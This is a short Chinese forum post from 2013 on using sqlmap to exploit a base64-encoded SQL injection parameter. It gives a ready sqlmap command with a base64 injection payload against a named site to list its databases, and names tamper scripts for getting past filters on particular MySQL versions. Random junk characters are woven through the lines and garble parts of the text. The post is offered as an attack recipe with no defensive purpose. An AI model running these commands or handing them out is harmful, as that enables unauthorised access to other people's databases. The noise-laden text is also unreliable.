WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?/ `9 y5 @5 U, |
0 ]$ L+ D, ^) F b) S5 ?/ N- r9 Jsqlmap的tamper里有个base64encode.py
8 d ]6 m. V3 ~- Y# g; v9 w; @4 c" x" }. |
使用如下; ~( ^6 g- I: H7 v
) p+ n# u, k) u+ `sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs
( ]/ J2 m5 |$ i9 f
9 ]5 U3 t! i3 o+ S
1 P3 c" ]. q1 |9 W$ I9 ^sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”
% i' W; U) E* c; A, d1 D5 s& W% I0 Y/ `
其中常用到的bypass脚本绕过SQLMAP主要两个脚本:/ k4 ?8 y1 }, r9 ?/ z/ }. W
$ T; `5 W2 w& Ospace2hash.py ,对于MYSQL数据库 4.0, 5.0注入
7 L$ N9 p* x, s# E K4 \, N/ nspace2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入
1 R- @% E$ J6 j& x; m首先确定目标数据库版本,然后选择相应的脚本。* f$ x' d8 T0 L" e
-v 3 --batch --tamper "space2hash.py"& w* c0 Q7 v' m' {8 W) Z1 v7 o
/ o- ~7 g7 R7 N/ Y& i) I7 _
还有其他一些插件:
. D8 P7 L! \) I7 V& \4 zencodes编码 ——charencode.py
$ Q! ~7 y& d6 e7 r/ `base64编码 —— base64encode.py
4 | F. j% U( V' \6 i. s/ C替换空格和关键字 —— halfversionedmorekeywords.py1 W4 a6 w4 T2 v0 X
|
! c2 Y$ s) Y2 W! O: J) O+ d
7 [6 Q3 Z8 E# y4 F: e
0 | D0 S1 K" \: a% n
- H' y8 N5 h, V% `2 K h |
发表于 2013-11-23 15:50:45
收藏
支持
反对